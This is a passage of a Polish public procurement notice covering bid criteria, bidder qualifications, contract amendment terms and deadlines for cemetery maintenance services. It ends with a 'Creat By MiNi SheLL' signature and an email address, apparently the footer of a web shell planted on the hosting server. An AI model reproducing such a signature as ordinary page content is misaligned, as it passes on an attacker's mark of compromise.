wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena – waga kryterium 60%;<br/>2) Termin płatności faktury/rachunku – waga kryterium 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury/rachunku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący sytuacji ekonomicznej lub finansowej oraz wykaże, że jest ubezpieczony od odpowiedzialności cywilnej (suma gwarancyjna co najmniej 100 000,00 zł słownie: sto tysięcy złotych 00/100) w zakresie prowadzonej działalności gospodarczej. Okres ważności polisy lub innego dokumentu ubezpieczenia musi obejmować co najmniej przewidziany przez zamawiającego w SWZ okres realizacji zadania. Jeżeli ważność polisy wygasa przed terminem wykonania zamówienia, Wykonawca winien dołączyć do oferty oświadczenie o przedłożeniu Zamawiającemu aktualnego dokumentu ubezpieczenia niezwłocznie po wygaśnięciu polisy/innego dokumentu ubezpieczenia.<br/>4) zdolności technicznej lub zawodowej:<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej oraz wykaże, że dysponuje lub będzie dysponował narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, a w szczególności:<br/>a) pojazdem z pługiem o szerokości przystosowanej do odśnieżania dróg i alejek cmentarnych – min. 1 szt.;<br/>b) pojazdem z kosiarką bijakową - min. 1 szt.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>3) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - wg załącznika nr 5.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.<br/>Oprócz przypadków o których mowa w art. 454 - 455 ustawy Pzp oraz w ustawie z 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. z 2023 r. poz. 1327 z późn. zm.) zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:<br/>1)<br/>terminu realizacji objętej umową:<br/>a)<br/>w przypadku opóźnienia w wyborze wykonawcy w procedurze przetargowej – o taką ilość dni o jaką nastąpiło opóźnienie względem terminu rozpoczęcia terminu realizacji umowy,<br/>2)<br/>wynagrodzenie Wykonawcy – zmiany stawki urzędowej podatku VAT oraz podatku akcyzowego jeśli zmiany te będą miały wpływ na koszt wykonania zamówienia przez Wykonawcę,<br/>3)<br/>w zakresie podwykonawstwa za uprzednią zgodą zamawiającego:<br/>a)<br/>powierzenie podwykonawcom innej części usługi niż wskazana w ofercie Wykonawcy,<br/>b)<br/>zmiana lub rezygnacja z podwykonawcy na etapie realizacji zamówienia,<br/>c)<br/>powierzenie części zamówienia podwykonawcom w trakcie realizacji zamówienia, pomimo niewskazania w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa.<br/>4)<br/>wstrzymania funkcjonowania cmentarza przez uprawnione organy, z przyczyn nie wynikających z winy stron umowy,<br/>5)<br/>wystawiania faktur, w tym określenie przez Zamawiającego zasad ich przekazywania przez wykonawcę.<br/>2.<br/>Wynagrodzenie Wykonawcy na zasadach określonych w niniejszej umowie oraz w treści art. 439 Pzp podlegać będzie waloryzacji prowadzącej do dokonywania zmian wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany cen dających się wyodrębnić i ustalić materiałów lub kosztów związanych z realizacją zamówienia. Zmiany<br/>wynagrodzenia, w związku ze wzrostem lub spadkiem cen mogą skutkować wzrostem lub spadkiem wynagrodzenia, w zależności od zmiany wskaźników cen, z tym zastrzeżeniem że: (... - szczegóły w projekcie umowy)<br/>3.<br/>W umowach zawieranych pomiędzy Wykonawcą, a podwykonawcą lub dalszym podwykonawcą, Wykonawca lub podwykonawca jest zobowiązany zawrzeć postanowienia przewidujące, iż w przypadku gdy umowa o podwykonawstwo przekracza lub przekroczy 6 miesięcy (np. w wyniku zawarcia aneksu), kwoty należne podwykonawcy będą korygowane dla oddania wzrostów lub spadków cen, zgodnie z ust. 1-3. Intencją stron jest aby warunki waloryzacji w umowach zawieranych pomiędzy Wykonawcą a podwykonawcą możliwie jak najbardziej odpowiadały warunkom waloryzacji przewidzianym w niniejszym paragrafie.<br/>4.<br/>Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 2-3, zobowiązany jest, w terminie 5 dni, do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę na usługi obowiązującą przez okres przekraczający 6 miesięcy, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, zgodnie z ust. 2-3. Do zmiany umowy o podwykonawstwo w sytuacji, o której mowa powyżej, stosuje się odpowiednio postanowienia § 3, z zastrzeżeniem, że przedstawiając projekt zmiany umowy o podwykonawstwo, Wykonawca zobowiązany jest dodatkowo przedstawić wyjaśnienia wskazujące na sposób ustalenia zakresu dokonywanej zmiany wynagrodzenia podwykonawcy.<br/>5.<br/>Zmiany treści umowy wymagają formy pisemnej, w formie aneksu do umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9e0f4c1b-f72f-4414-8b1d-be402c415fd0</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-29 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com